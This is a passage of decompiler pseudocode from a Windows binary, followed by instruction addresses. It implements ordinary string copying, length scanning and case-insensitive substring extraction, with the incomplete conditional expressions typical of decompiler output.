				signed int _t368;
				signed int _t369;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t386;
				void* _t389;
				signed int _t390;
				char _t392;
				signed int _t395;
				signed int _t400;
				char _t402;
				char _t403;
				char _t404;
				signed int _t406;
				unsigned int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				signed int _t421;
				signed int _t422;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t450;
				signed int _t452;
				signed int _t461;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t478;
				signed int _t482;
				void* _t485;

				_v56 = 0;
				_t449 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t406 = E6E791030();
				_t485 = (_t482 & 0xfffffff0) - 0x34 + 4;
				_t230 = _v56;
				if(_t230 == 0) {
					 *_t406 = 0;
					L8:
					_t231 = _a8;
					_v52 = 0x40;
					_v56 = _t406;
					if(_t231 != 0) {
						__eflags = _t406;
						if(_t406 == 0) {
							_t310 = 0x40;
							_t283 = 0;
							L22:
							_t20 = _t283 + 2; // 0x80000001
							_t341 = _t20;
							__eflags = _t341 - 0x40;
							_t342 =  <=  ? 0x40 : _t341;
							__eflags = _t310 - _t342;
							if(_t310 < _t342) {
								_t411 = (_t342 >> 5 >> 0x1a) + _t342 >> 6;
								_t343 = _t342 & 0x8000003f;
								__eflags = _t343;
								if(_t343 < 0) {
									_t343 = (_t343 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t343;
								}
								__eflags = _t343;
								_t413 = _t411 + (0 | _t343 > 0x00000000) << 6;
								_push(_t413);
								_t311 = E6E791030();
								_t485 = _t485 + 4;
								_t344 = _v56;
								__eflags = _t344;
								if(_t344 == 0) {
									 *_t311 = 0;
									goto L35;
								} else {
									__eflags = _t311;
									if(_t311 == 0) {
										L33:
										_push(1);
										_push(_t344);
										_v68 = _t311;
										E6E7910B0();
										_t311 = _v68;
										_t485 = _t485 + 8;
										L35:
										_v52 = _t413;
										_v56 = _t311;
										L36:
										 *((char*)(_t311 + _t283)) = _a8;
										_t237 =  &_v56;
										 *((char*)(_t283 +  *_t237 + 1)) = 0;
										L37:
										_t238 =  *_t237;
										_v28 = _t238;
										_t284 = _a4;
										if(_t238 == 0) {
											L39:
											_push(0x40);
											 *_t284 = 0;
											 *(_t284 + 4) = 0;
											_t450 = E6E791030();
											_t485 = _t485 + 4;
											_t347 =  *_t284;
											if(_t347 == 0) {
												 *_t450 = 0;
												L61:
												 *_t284 = _t450;
												 *(_t284 + 4) = 0x40;
												L62:
												_push(1);
												_push(_v56);
												E6E7910B0();
												_v56 = 0;
												_v52 = 0;
												return _t284;
											}
											if(_t450 == 0) {
												L45:
												_push(1);
												_push(_t347);
												E6E7910B0();
												_t485 = _t485 + 8;
												goto L61;
											}
											_t312 =  *_t347;
											 *_t450 = _t312;
											if(_t312 == 0) {
												goto L45;
											}
											_t415 = 0;
											while(1) {
												_t415 = _t415 + 1;
												_t313 =  *((char*)(_t347 + _t415 * 2 - 1));
												 *((char*)(_t450 + _t415 * 2 - 1)) = _t313;
												if(_t313 == 0) {
													goto L45;
												}
												_t314 =  *((char*)(_t347 + _t415 * 2));
												 *((char*)(_t450 + _t415 * 2)) = _t314;
												if(_t314 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t315 =  *_t238;
										_v48 = _t315;
										if(_t315 != 0) {
											_t350 =  *_t449;
											_v60 = _t350;
											__eflags = _t350;
											if(_t350 == 0) {
												L53:
												_push(0x40);
												 *_t284 = 0;
												 *(_t284 + 4) = 0;
												_t450 = E6E791030();
												_t485 = _t485 + 4;
												_t352 =  *_t284;
												__eflags = _t352;
												if(_t352 == 0) {
													 *_t450 = 0;
													goto L61;
												}
												__eflags = _t450;
												if(_t450 == 0) {
													L59:
													_push(1);
													_push(_t352);
													E6E7910B0();
													_t485 = _t485 + 8;
													goto L61;
												}
												_t316 =  *_t352;
												 *_t450 = _t316;
												__eflags = _t316;
												if(_t316 == 0) {
													goto L59;
												}
												_t416 = 0;
												__eflags = 0;
												while(1) {
													_t416 = _t416 + 1;
													_t317 =  *((char*)(_t352 + _t416 * 2 - 1));
													 *(_t450 + _t416 * 2 - 1) = _t317;
													__eflags = _t317;
													if(_t317 == 0) {
														goto L59;
													}
													_t318 =  *((char*)(_t352 + _t416 * 2));
													 *(_t450 + _t416 * 2) = _t318;
													__eflags = _t318;
													if(_t318 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t350;
											if( *_t350 == 0) {
												goto L53;
											}
											_t417 = _t315;
											_t319 = _t350;
											_t63 = _t417 - 0x41; // -65
											_t452 = _t63;
											_v64 = _t452;
											__eflags = _t452 - 0x19;
											_t65 = _t417 + 0x20; // 0x20
											_t354 =  >  ? _t315 : _t65;
											_t245 =  >  ? _t315 : _t65;
											_t355 = 0;
											__eflags = 0;
											while(1) {
												_t286 =  *_t319;
												__eflags = _t286 - 0x41 - 0x19;
												_t287 =  <=  ? _t286 + 0x20 : _t286;
												__eflags = ( <=  ? _t286 + 0x20 : _t286) - _t245;
												if(( <=  ? _t286 + 0x20 : _t286) == _t245) {
													break;
												}
												_t355 = _t355 + 1;
												_t319 = _t319 + 1;
												_t300 = _v60;
												__eflags =  *((char*)(_t355 + _t300));
												if( *((char*)(_t355 + _t300)) != 0) {
													continue;
												}
												L52:
												_t284 = _a4;
												goto L53;
											}
											_t284 = _a4;
											__eflags = _t319;
											if(_t319 == 0) {
												goto L53;
											}
											_t357 = _v28 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t421 =  ~_t357 + 0x10;
											__eflags = _t421;
											_v32 = _t421;
											_v40 = _v48 + 0x20;
											_t246 = _t421;
											do {
												_t422 = _t357;
												__eflags = _t357;
												if(_t357 == 0) {
													L69:
													_t461 =  ~( ~_t422 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t461;
													while(1) {
														asm("movdqu xmm1, [eax+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb ebx, xmm1");
														__eflags = _t284;
														if(_t284 != 0) {
															break;
														}
														_t422 = _t422 + 0x10;
														__eflags = _t422 - _t461;
														if(_t422 < _t461) {
															continue;
														}
														__eflags = _t461 - 0x7fffffff;
														if(_t461 >= 0x7fffffff) {
															L76:
															_t461 = 0x7fffffff;
															L77:
															_v68 = _t461;
															_t288 = 0;
															__eflags = 0;
															_v44 = _t357;
															while(1) {
																_t249 =  *((char*)(_t288 + _t319));
																_t359 =  *((char*)(_t288 + _v28));
																__eflags = _t249 - 0x61 - 0x19;
																_t250 =  <=  ? _t249 - 0x20 : _t249;
																__eflags = _t359 - 0x61 - 0x19;
																_t251 =  <=  ? _t249 - 0x20 : _t249;
																_t360 =  <=  ? _t359 - 0x20 : _t359;
																_t361 =  <=  ? _t359 - 0x20 : _t359;
																__eflags = _t251 - ( <=  ? _t359 - 0x20 : _t359);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t251;
																if(_t251 == 0) {
																	L82:
																	_t357 = _v44;
																	_t466 = _v40;
																	_t284 = _a4;
																	L83:
																	__eflags = _t319;
																	if(_t319 == 0) {
																		goto L53;
																	}
																	_v44 = _t357;
																	while(1) {
																		L85:
																		_t254 = _t319;
																		_t292 = _t319 + 1;
																		__eflags = _t292;
																		if(_t292 == 0) {
																			break;
																		}
																		__eflags =  *(_t319 + 1);
																		if( *(_t319 + 1) == 0) {
																			break;
																		}
																		__eflags = _v64 - 0x19;
																		_t388 =  <=  ? _t466 : _v48;
																		_t389 =  <=  ? _t466 : _v48;
																		_v36 = _t254;
																		_v40 = _t466;
																		while(1) {
																			_t319 = _t319 + 1;
																			_t292 = _t292 + 1;
																			_t266 =  *_t319 & 0x000000ff;
																			_t466 =  *((char*)(_t292 - 1)) + 0xffffffbf;
																			__eflags = _t466 - 0x19;
																			_t267 =  <=  ? _t266 + 0x20 : _t266;
																			__eflags = ( <=  ? _t266 + 0x20 : _t266) - _t389;
																			if(( <=  ? _t266 + 0x20 : _t266) == _t389) {
																				break;
																			}
																			__eflags =  *_t292;
																			if( *_t292 != 0) {
																				continue;
																			}
																			L90:
																			_t254 = _v36;
																			_t365 = _v44;
																			_t284 = _a4;
																			L91:
																			__eflags = _t365;
																			if(_t365 == 0) {
																				L95:
																				_t325 =  ~( ~_t365 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t325;
																				while(1) {
																					asm("movdqu xmm1, [edi+edx]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb esi, xmm1");
																					__eflags = _t466;
																					if(_t466 != 0) {
																						break;
																					}
																					_t365 = _t365 + 0x10;
																					__eflags = _t365 - _t325;
																					if(_t365 < _t325) {
																						continue;
																					}
																					__eflags = _t325 - 0x7fffffff;
																					if(_t325 >= 0x7fffffff) {
																						L102:
																						_t325 = 0x7fffffff;
																						L103:
																						_t468 = _v60 & 0x0000000f;
																						__eflags = _t468;
																						if(_t468 == 0) {
																							L107:
																							_t433 =  ~( ~_t468 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t433;
																							while(1) {
																								asm("movdqu xmm1, [ebx+esi]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb edx, xmm1");
																								__eflags = _t365;
																								if(_t365 != 0) {
																									break;
																								}
																								_t468 = _t468 + 0x10;
																								__eflags = _t468 - _t433;
																								if(_t468 < _t433) {
																									continue;
																								}
																								_t284 = _a4;
																								__eflags = _t433 - 0x7fffffff;
																								if(_t433 >= 0x7fffffff) {
																									L114:
																									_t433 = 0x7fffffff;
																									L115:
																									_t366 = _v60;
																									_t256 = _t254 - _t366 + _t325;
																									_t326 = 0;
																									__eflags = _t256;
																									 *_t284 = 0;
																									_t257 =  <=  ? 0 : _t256;
																									__eflags = _t433 - _t257;
																									 *(_t284 + 4) = 0;
																									_t258 =  <  ? _t433 : _t257;
																									_t434 = _t433 - _t258;
																									_t367 = _t366 + _t258;
																									__eflags = _t367;
																									_v64 = _t367;
																									if(_t367 == 0) {
																										L151:
																										_push(0x40);
																										_t450 = E6E791030();
																										_t485 = _t485 + 4;
																										_t368 =  *_t284;
																										__eflags = _t368;
																										if(_t368 == 0) {
																											 *_t450 = 0;
																											goto L61;
																										}
																										__eflags = _t450;
																										if(_t450 == 0) {
																											L157:
																											_push(1);
																											_push(_t368);
																											E6E7910B0();
																											_t485 = _t485 + 8;
																											goto L61;
																										}
																										_t327 =  *_t368;
																										 *_t450 = _t327;
																										__eflags = _t327;
																										if(_t327 == 0) {
																											goto L157;
																										}
																										_t435 = 0;
																										__eflags = 0;
																										while(1) {
																											_t435 = _t435 + 1;
																											_t328 =  *((char*)(_t368 + _t435 * 2 - 1));
																											 *(_t450 + _t435 * 2 - 1) = _t328;
																											__eflags = _t328;
																											if(_t328 == 0) {
																												goto L157;
																											}
																											_t329 =  *((char*)(_t368 + _t435 * 2));
																											 *(_t450 + _t435 * 2) = _t329;
																											__eflags = _t329;
																											if(_t329 != 0) {
																												continue;
																											}
																											goto L157;
																										}
																										goto L157;
																									}
																									_t369 = _v60;
																									__eflags =  *(_t369 + _t258);
																									if( *(_t369 + _t258) == 0) {
																										goto L151;
																									}
																									__eflags = _t434;
																									if(_t434 != 0) {
																										L130:
																										_t144 = _t434 + 1; // 0x80000000
																										_t330 = _t144;
																										__eflags = _t330 - 0x40;
																										_t331 =  <=  ? 0x40 : _t330;
																										__eflags = _t331;
																										if(_t331 > 0) {
																											_v68 = (_t331 >> 5 >> 0x1a) + _t331 >> 6;
																											_t332 = _t331 & 0x8000003f;
																											__eflags = _t332;
																											if(_t332 < 0) {
																												_t332 = (_t332 - 0x00000001 | 0xffffffc0) + 1;
																												__eflags = _t332;
																											}
																											__eflags = _t332;
																											_t335 = _v68 + (0 | _t332 > 0x00000000) << 6;
																											_v68 = _t335;
																											_push(_t335);
																											_t469 = E6E791030();
																											_t485 = _t485 + 4;
																											_t336 =  *_t284;
																											__eflags = _t336;
																											if(_t336 == 0) {
																												 *_t469 = 0;
																												goto L143;
																											} else {
																												__eflags = _t469;
																												if(_t469 == 0) {
																													L141:
																													_push(1);
																													_push(_t336);
																													E6E7910B0();
																													_t485 = _t485 + 8;
																													L143:
																													 *(_t284 + 4) = _v68;
																													 *_t284 = _t469;
																													L144:
																													__eflags = _t469;
																													if(_t469 == 0) {
																														goto L62;
																													}
																													_t262 = _v64;
																													_t337 = 0;
																													while(1) {
																														_t379 =  *_t262;
																														_t337 = _t337 + 1;
																														 *_t469 = _t379;
																														__eflags = _t434;
																														if(_t434 == 0) {
																															goto L149;
																														}
																														__eflags = _t337 - _t434;
																														if(_t337 == _t434) {
																															 *(_t469 + 1) = 0;
																															goto L62;
																														}
																														L149:
																														__eflags = _t379;
																														if(_t379 == 0) {
																															goto L62;
																														}
																														_t469 = _t469 + 1;
																														_t262 = _t262 + 1;
																														__eflags = _t262;
																													}
																												}
																												_t380 =  *_t336;
																												 *_t469 = _t380;
																												__eflags = _t380;
																												if(_t380 == 0) {
																													goto L141;
																												}
																												_t381 = 0;
																												__eflags = 0;
																												while(1) {
																													_t381 = _t381 + 1;
																													_t264 =  *((char*)(_t336 + _t381 * 2 - 1));
																													 *(_t469 + _t381 * 2 - 1) = _t264;
																													__eflags = _t264;
																													if(_t264 == 0) {
																														break;
																													}
																													_t265 =  *((char*)(_t336 + _t381 * 2));
																													 *(_t469 + _t381 * 2) = _t265;
																													__eflags = _t265;
																													if(_t265 != 0) {
																														continue;
																													}
																													break;
																												}
																												_t284 = _a4;
																												goto L141;
																											}
																										}
																										_t469 = 0;
																										goto L144;
																									}
																									_t382 = _t369 + _t258;
																									_v60 = _t382;
																									_t383 = _t382 & 0x0000000f;
																									__eflags = _t383;
																									if(_t383 == 0) {
																										L122:
																										_t434 =  ~( ~_t383 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																										__eflags = _t434;
																										while(1) {
																											asm("movdqu xmm1, [esi+edx]");
																											asm("pcmpeqb xmm1, xmm0");
																											asm("pmovmskb ecx, xmm1");
																											__eflags = _t326;
																											if(_t326 != 0) {
																												break;
																											}
																											_t383 = _t383 + 0x10;
																											__eflags = _t383 - _t434;
																											if(_t383 < _t434) {
																												continue;
																											}
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 >= 0x7fffffff) {
																												L129:
																												_t434 = 0x7fffffff;
																												goto L130;
																											}
																											_t384 = _v60;
																											while(1) {
																												__eflags =  *((char*)(_t434 + _t384));
																												if( *((char*)(_t434 + _t384)) == 0) {
																													goto L130;
																												}
																												_t434 = _t434 + 1;
																												__eflags = _t434 - 0x7fffffff;
																												if(_t434 < 0x7fffffff) {
																													continue;
																												}
																												goto L129;
																											}
																											goto L130;
																										}
																										asm("bsf edi, ecx");
																										_t434 = _t434 + _t383;
																										goto L130;
																									}
																									_t434 = 0;
																									_t326 = _v60;
																									_t383 =  ~_t383 + 0x10;
																									__eflags = _t383;
																									while(1) {
																										__eflags =  *((char*)(_t434 + _t326));
																										if( *((char*)(_t434 + _t326)) == 0) {
																											goto L130;
																										}
																										_t434 = _t434 + 1;
																										__eflags = _t434 - _t383;
																										if(_t434 < _t383) {
																											continue;
																										}
																										goto L122;
																									}
																									goto L130;
																								}
																								_t386 = _v60;
																								while(1) {
																									__eflags =  *((char*)(_t433 + _t386));
																									if( *((char*)(_t433 + _t386)) == 0) {
																										goto L115;
																									}
																									_t433 = _t433 + 1;
																									__eflags = _t433 - 0x7fffffff;
																									if(_t433 < 0x7fffffff) {
																										continue;
																									}
																									goto L114;
																								}
																								goto L115;
																							}
																							asm("bsf edi, edx");
																							_t284 = _a4;
																							_t433 = _t433 + _t468;
																							goto L115;
																						}
																						_t433 = 0;
																						_t365 = _v60;
																						_t468 =  ~_t468 + 0x10;
																						__eflags = _t468;
																						while(1) {
																							__eflags =  *((char*)(_t433 + _t365));
																							if( *((char*)(_t433 + _t365)) == 0) {
																								goto L115;
																							}
																							_t433 = _t433 + 1;
																							__eflags = _t433 - _t468;
																							if(_t433 < _t468) {
																								continue;
																							}
																							goto L107;
																						}
																						goto L115;
																					}
																					_t365 = _v28;
																					while(1) {
																						__eflags =  *(_t325 + _t365);
																						if( *(_t325 + _t365) == 0) {
																							goto L103;
																						}
																						_t325 = _t325 + 1;
																						__eflags = _t325 - 0x7fffffff;
																						if(_t325 < 0x7fffffff) {
																							continue;
																						}
																						goto L102;
																					}
																					goto L103;
																				}
																				asm("bsf ecx, esi");
																				_t325 = _t325 + _t365;
																				goto L103;
																			}
																			_t365 = _v32;
																			_t325 = 0;
																			__eflags = 0;
																			_t441 = _v28;
																			_t466 = _t365;
																			while(1) {
																				__eflags =  *((char*)(_t325 + _t441));
																				if( *((char*)(_t325 + _t441)) == 0) {
																					goto L103;
																				}
																				_t325 = _t325 + 1;
																				__eflags = _t325 - _t466;
																				if(_t325 < _t466) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L103;
																		}
																		_t254 = _v36;
																		_t466 = _v40;
																		__eflags = _t319;
																		if(_t319 == 0) {
																			break;
																		}
																		_v36 = _t254;
																		_v40 = _t466;
																		_t390 = _v44;
																		_t268 = _v32;
																		do {
																			_t443 = _t390;
																			__eflags = _t390;
																			if(_t390 == 0) {
																				L169:
																				_t478 =  ~( ~_t443 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t478;
																				while(1) {
																					asm("movdqu xmm1, [eax+edi]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb ebx, xmm1");
																					__eflags = _t292;
																					if(_t292 != 0) {
																						break;
																					}
																					_t443 = _t443 + 0x10;
																					__eflags = _t443 - _t478;
																					if(_t443 < _t478) {
																						continue;
																					}
																					__eflags = _t478 - 0x7fffffff;
																					if(_t478 >= 0x7fffffff) {
																						L176:
																						_t478 = 0x7fffffff;
																						L177:
																						_v68 = _t478;
																						_t295 = 0;
																						__eflags = 0;
																						_v44 = _t390;
																						while(1) {
																							_t271 =  *((char*)(_t295 + _t319));
																							_t392 =  *((char*)(_t295 + _v28));
																							__eflags = _t271 - 0x61 - 0x19;
																							_t272 =  <=  ? _t271 - 0x20 : _t271;
																							__eflags = _t392 - 0x61 - 0x19;
																							_t273 =  <=  ? _t271 - 0x20 : _t271;
																							_t393 =  <=  ? _t392 - 0x20 : _t392;
																							_t394 =  <=  ? _t392 - 0x20 : _t392;
																							__eflags = _t273 - ( <=  ? _t392 - 0x20 : _t392);
																							if(__eflags < 0 || __eflags > 0) {
																								break;
																							}
																							__eflags = _t273;
																							if(_t273 == 0) {
																								L182:
																								_t254 = _v36;
																								_t466 = _v40;
																								L183:
																								__eflags = _t319;
																								if(_t319 != 0) {
																									goto L85;
																								}
																								goto L184;
																							}
																							_t295 = _t295 + 1;
																							__eflags = _t295 - _v68;
																							if(_t295 < _v68) {
																								continue;
																							}
																							goto L182;
																						}
																						_t365 = _v44;
																						_t466 = _t319 + 1;
																						__eflags = _t466;
																						if(_t466 == 0) {
																							goto L192;
																						}
																						__eflags = _v64 - 0x19;
																						_t297 =  <=  ? _v40 : _v48;
																						_t292 =  <=  ? _v40 : _v48;
																						__eflags =  *(_t319 + 1);
																						if( *(_t319 + 1) == 0) {
																							goto L192;
																						}
																						_v44 = _t365;
																						while(1) {
																							_t319 = _t319 + 1;
																							_t466 = _t466 + 1;
																							_t395 =  *_t319 & 0x000000ff;
																							__eflags =  *((char*)(_t466 - 1)) + 0xffffffbf - 0x19;
																							_t396 =  <=  ? _t395 + 0x20 : _t395;
																							__eflags = ( <=  ? _t395 + 0x20 : _t395) - _t292;
																							if(( <=  ? _t395 + 0x20 : _t395) == _t292) {
																								goto L191;
																							}
																							__eflags =  *_t466;
																							if( *_t466 != 0) {
																								continue;
																							}
																							goto L90;
																						}
																						goto L191;
																					}
																					_t298 = _v28;
																					while(1) {
																						__eflags =  *((char*)(_t478 + _t298));
																						if( *((char*)(_t478 + _t298)) == 0) {
																							break;
																						}
																						_t478 = _t478 + 1;
																						__eflags = _t478 - 0x7fffffff;
																						if(_t478 < 0x7fffffff) {
																							continue;
																						}
																						goto L176;
																					}
																					L193:
																					__eflags = _t478;
																					if(__eflags == 0) {
																						goto L176;
																					}
																					if(__eflags > 0) {
																						goto L177;
																					}
																					_v44 = _t390;
																					_t254 = _v36;
																					_t466 = _v40;
																					goto L183;
																				}
																				asm("bsf esi, ebx");
																				_t478 = _t478 + _t443;
																				goto L193;
																			}
																			_t292 = _v28;
																			_t443 = _t268;
																			_t478 = 0;
																			__eflags = 0;
																			while(1) {
																				__eflags =  *((char*)(_t478 + _t292));
																				if( *((char*)(_t478 + _t292)) == 0) {
																					goto L193;
																				}
																				_t478 = _t478 + 1;
																				__eflags = _t478 - _t268;
																				if(_t478 < _t268) {
																					continue;
																				}
																				goto L169;
																			}
																			goto L193;
																			L191:
																			_t390 = _v44;
																			_t268 = _v32;
																			__eflags = _t319;
																		} while (_t319 != 0);
																		L192:
																		_t254 = _v36;
																		_t284 = _a4;
																		goto L91;
																	}
																	L184:
																	_t365 = _v44;
																	goto L91;
																}
																_t288 = _t288 + 1;
																__eflags = _t288 - _v68;
																if(_t288 < _v68) {
																	continue;
																}
																goto L82;
															}
															_t362 = _v44;
															_t465 = _t319 + 1;
															__eflags = _t465;
															if(_t465 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t290 =  <=  ? _v40 : _v48;
															_t284 =  <=  ? _v40 : _v48;
															__eflags =  *(_t319 + 1);
															if( *(_t319 + 1) == 0) {
																goto L52;
															}
															_v44 = _t362;
															while(1) {
																_t319 = _t319 + 1;
																_t465 = _t465 + 1;
																_t363 =  *_t319 & 0x000000ff;
																__eflags =  *((char*)(_t465 - 1)) + 0xffffffbf - 0x19;
																_t364 =  <=  ? _t363 + 0x20 : _t363;
																__eflags = ( <=  ? _t363 + 0x20 : _t363) - _t284;
																if(( <=  ? _t363 + 0x20 : _t363) == _t284) {
																	goto L207;
																}
																__eflags =  *_t465;
																if( *_t465 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L207;
														}
														_t299 = _v28;
														while(1) {
															__eflags =  *((char*)(_t461 + _t299));
															if( *((char*)(_t461 + _t299)) == 0) {
																break;
															}
															_t461 = _t461 + 1;
															__eflags = _t461 - 0x7fffffff;
															if(_t461 < 0x7fffffff) {
																continue;
															}
															goto L76;
														}
														L203:
														__eflags = _t461;
														if(__eflags == 0) {
															goto L76;
														}
														if(__eflags > 0) {
															goto L77;
														}
														_t466 = _v40;
														_t284 = _a4;
														goto L83;
													}
													asm("bsf esi, ebx");
													_t461 = _t461 + _t422;
													goto L203;
												}
												_t284 = _v28;
												_t422 = _t246;
												_t461 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t461 + _t284));
													if( *((char*)(_t461 + _t284)) == 0) {
														goto L203;
													}
													_t461 = _t461 + 1;
													__eflags = _t461 - _t246;
													if(_t461 < _t246) {
														continue;
													}
													goto L69;
												}
												goto L203;
												L207:
												_t357 = _v44;
												_t246 = _v32;
												__eflags = _t319;
											} while (_t319 != 0);
											goto L52;
										}
										goto L39;
									}
									_t279 =  *_t344;
									 *_t311 = _t279;
									__eflags = _t279;
									if(_t279 == 0) {
										goto L33;
									}
									_v60 = _t413;
									_t280 = 0;
									__eflags = 0;
									_v64 = _t283;
									_v68 = _t449;
									while(1) {
										_t280 = _t280 + 1;
										_t301 =  *((char*)(_t344 + _t280 * 2 - 1));
										 *(_t311 + _t280 * 2 - 1) = _t301;
										__eflags = _t301;
										if(_t301 == 0) {
											break;
										}
										_t302 =  *((char*)(_t344 + _t280 * 2));
										 *(_t311 + _t280 * 2) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											continue;
										}
										break;
									}
									_t413 = _v60;
									_t283 = _v64;
									_t449 = _v68;
									goto L33;
								}
							}
							_t311 = _v56;
							goto L36;
						}
						_t400 = _t406 & 0x0000000f;
						__eflags = _t400;
						if(_t400 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t308 =  ~( ~_t400 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t308;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t231;
								if(_t231 != 0) {
									break;
								}
								_t400 = _t400 + 0x10;
								__eflags = _t400 - _t308;
								if(_t400 < _t308) {
									continue;
								}
								__eflags = _t308 - 0x7fffffff;
								if(_t308 >= 0x7fffffff) {
									L21:
									_t310 = 0x40;
									_t283 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t308 + _t406));
									if( *((char*)(_t308 + _t406)) == 0) {
										break;
									}
									_t308 = _t308 + 1;
									__eflags = _t308 - 0x7fffffff;
									if(_t308 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L209:
								__eflags = _t283 - 0xfffffffe;
								if(_t283 != 0xfffffffe) {
									_t310 = 0x40;
								} else {
									 *_t406 = 0;
									_t310 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t283 = _t308 + _t400;
							goto L209;
						}
						_t283 = 0;
						_t400 =  ~_t400 + 0x10;
						__eflags = _t400;
						while(1) {
							__eflags =  *((char*)(_t283 + _t406));
							if( *((char*)(_t283 + _t406)) == 0) {
								goto L209;
							}
							_t283 = _t283 + 1;
							__eflags = _t283 - _t400;
							if(_t283 < _t400) {
								continue;
							}
							goto L15;
						}
						goto L209;
					}
					_t237 =  &_v56;
					goto L37;
				}
				if(_t406 == 0) {
					L6:
					_push(1);
					_push(_t230);
					E6E7910B0();
					_t485 = _t485 + 8;
					goto L8;
				}
				_t402 =  *_t230;
				 *_t406 = _t402;
				if(_t402 == 0) {
					goto L6;
				}
				_t340 = 0;
				while(1) {
					_t340 = _t340 + 1;
					_t403 =  *((char*)(_t230 + _t340 * 2 - 1));
					 *((char*)(_t406 + _t340 * 2 - 1)) = _t403;
					if(_t403 == 0) {
						goto L6;
					}
					_t404 =  *((char*)(_t230 + _t340 * 2));
					 *((char*)(_t406 + _t340 * 2)) = _t404;
					if(_t404 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6e7a2e6e
0x6e7a2e72
0x6e7a2e74
0x6e7a2e78
0x6e7a2e7f
0x6e7a2e81
0x6e7a2e84
0x6e7a2e8a
0x6e7a2ec1
0x6e7a2ec4
0x6e7a2ec4
0x6e7a2ec8
0x6e7a2ed0
0x6e7a2ed6
0x6e7a2ee1
0x6e7a2ee3
0x6e7a37d3
0x6e7a37d8
0x6e7a2f5d
0x6e7a2f62
0x6e7a2f62
0x6e7a2f65
0x6e7a2f68
0x6e7a2f6b
0x6e7a2f6d
0x6e7a2f82
0x6e7a2f85
0x6e7a2f85
0x6e7a2f8b
0x6e7a2f93
0x6e7a2f93
0x6e7a2f93
0x6e7a2f96
0x6e7a2f9d
0x6e7a2fa0
0x6e7a2fa6
0x6e7a2fa8
0x6e7a2fab
0x6e7a2faf
0x6e7a2fb1
0x6e7a3006
0x00000000
0x6e7a2fb3
0x6e7a2fb3
0x6e7a2fb5
0x6e7a2ff1
0x6e7a2ff1
0x6e7a2ff3
0x6e7a2ff4
0x6e7a2ff8
0x6e7a2ffd
0x6e7a3001
0x6e7a3009
0x6e7a3009
0x6e7a300d
0x6e7a3011
0x6e7a3015
0x6e7a3018
0x6e7a301e
0x6e7a3023
0x6e7a3023
0x6e7a3025
0x6e7a3029
0x6e7a302e
0x6e7a303d
0x6e7a303d
0x6e7a3041
0x6e7a3043
0x6e7a304b
0x6e7a304d
0x6e7a3050
0x6e7a3054
0x6e7a308e
0x6e7a3135
0x6e7a3135
0x6e7a3137
0x6e7a313e
0x6e7a313e
0x6e7a3140
0x6e7a3144
0x6e7a3150
0x6e7a3154
0x6e7a3161
0x6e7a3161
0x6e7a3058
0x6e7a307e
0x6e7a307e
0x6e7a3080
0x6e7a3081
0x6e7a3086
0x00000000
0x6e7a3086
0x6e7a305a
0x6e7a305d
0x6e7a3061
0x00000000
0x00000000
0x6e7a3063
0x6e7a3065
0x6e7a3065
0x6e7a3066
0x6e7a306b
0x6e7a3071
0x00000000
0x00000000
0x6e7a3073
0x6e7a3077
0x6e7a307c
0x00000000
0x00000000
0x00000000
0x6e7a307c
0x00000000
0x6e7a3065
0x6e7a3032
0x6e7a3035
0x6e7a303b
0x6e7a3096
0x6e7a3098
0x6e7a309c
0x6e7a309e
0x6e7a30e4
0x6e7a30e4
0x6e7a30e8
0x6e7a30ea
0x6e7a30f2
0x6e7a30f4
0x6e7a30f7
0x6e7a30f9
0x6e7a30fb
0x6e7a3132
0x00000000
0x6e7a3132
0x6e7a30fd
0x6e7a30ff
0x6e7a3125
0x6e7a3125
0x6e7a3127
0x6e7a3128
0x6e7a312d
0x00000000
0x6e7a312d
0x6e7a3101
0x6e7a3104
0x6e7a3106
0x6e7a3108
0x00000000
0x00000000
0x6e7a310a
0x6e7a310a
0x6e7a310c
0x6e7a310c
0x6e7a310d
0x6e7a3112
0x6e7a3116
0x6e7a3118
0x00000000
0x00000000
0x6e7a311a
0x6e7a311e
0x6e7a3121
0x6e7a3123
0x00000000
0x00000000
0x00000000
0x6e7a3123
0x00000000
0x6e7a310c
0x6e7a30a0
0x6e7a30a3
0x00000000
0x00000000
0x6e7a30a5
0x6e7a30a7
0x6e7a30a9
0x6e7a30a9
0x6e7a30ac
0x6e7a30b0
0x6e7a30b3
0x6e7a30b6
0x6e7a30b9
0x6e7a30bc
0x6e7a30bc
0x6e7a30be
0x6e7a30be
